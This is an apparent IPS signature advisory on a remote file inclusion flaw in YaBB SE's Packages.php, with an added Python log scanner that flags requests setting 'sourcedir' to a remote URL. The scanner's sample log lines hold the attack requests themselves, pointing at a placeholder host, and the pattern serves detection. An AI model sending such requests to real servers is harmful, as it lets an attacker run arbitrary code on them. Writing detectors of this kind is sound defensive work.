YaBB.SE.Packages.php.Remote.File.Inclusion

Description

This indicates a possible attempt to exploit a PHP code inclusion vulnerability in the YaBB software package.


YaBB (Yet Another Bulletin Board) is an open-source bulletin board system for any system. A vulnerability has been reported in it that may allow an attacker to execute arbitrary PHP code on the vulnerable system. The vulnerability is in the Packages.php script, which uses the undefined variable $sourcedir. A remote attacker may send a specially crafted URL request directly to the Packages.php script that specifies the Packer.php script from a remote system as a parameter, which would allow the attacker to execute code on the vulnerable web server.
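A log-review check for the request pattern described above, as an added example that is not part of the original advisory or the vendor's signature. It assumes the undefined $sourcedir variable is supplied as a query parameter of the same name and that the server writes combined-format access logs; the paths, addresses and host name in the sample lines are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request line inside a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that makes an include path point at another host.
REMOTE = re.compile(r"\s*(?:https?|ftps?)://", re.I)

# Constructed sample log lines (documentation addresses, placeholder host).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /forum/index.php?board=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:04 +0000] "GET /forum/Packages.php?sourcedir=http://remote.example.test/ HTTP/1.1" 200 312',
    '203.0.113.5 - - [01/Jan/2024:10:00:09 +0000] "GET /forum/Packages.php?sourcedir=http%3A%2F%2Fremote.example.test%2F HTTP/1.0" 200 312',
    '192.0.2.44 - - [01/Jan/2024:10:00:12 +0000] "GET /forum/index.php?sourcedir=http://remote.example.test/ HTTP/1.1" 200 900',
    '192.0.2.45 - - [01/Jan/2024:10:00:15 +0000] "GET /forum/Packages.php?sourcedir=./Sources HTTP/1.1" 200 10',
]


def is_inclusion_attempt(target):
    """True when a direct request to Packages.php sets sourcedir to a remote location."""
    parts = urlsplit(target)
    # Only direct requests to the script itself match the advisory's description.
    if not unquote(parts.path).lower().endswith("/packages.php"):
        return False
    # parse_qsl percent-decodes names and values once, so encoded URLs are caught too.
    return any(
        name == "sourcedir" and REMOTE.match(value)
        for name, value in parse_qsl(parts.query, keep_blank_values=True)
    )


def scan(lines):
    """Return the client address (first log field) of every matching request."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if m and is_inclusion_attempt(m.group(1)):
            hits.append(line.split()[0])
    return hits


if __name__ == "__main__":
    for client in scan(SAMPLE_LOG):
        print("possible Packages.php remote file inclusion from", client)
```

A hit only shows that the request was made; whether the include succeeded depends on the installed YaBB SE version and the server's PHP configuration.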

Affected Products

YaBB SE 1.5.0 and earlier versions.

Impact

Compromise of the affected system.

Recommended Actions

Apply vendor-supplied patches.

Coverage

IPS (Regular DB)
IPS (Extended DB)
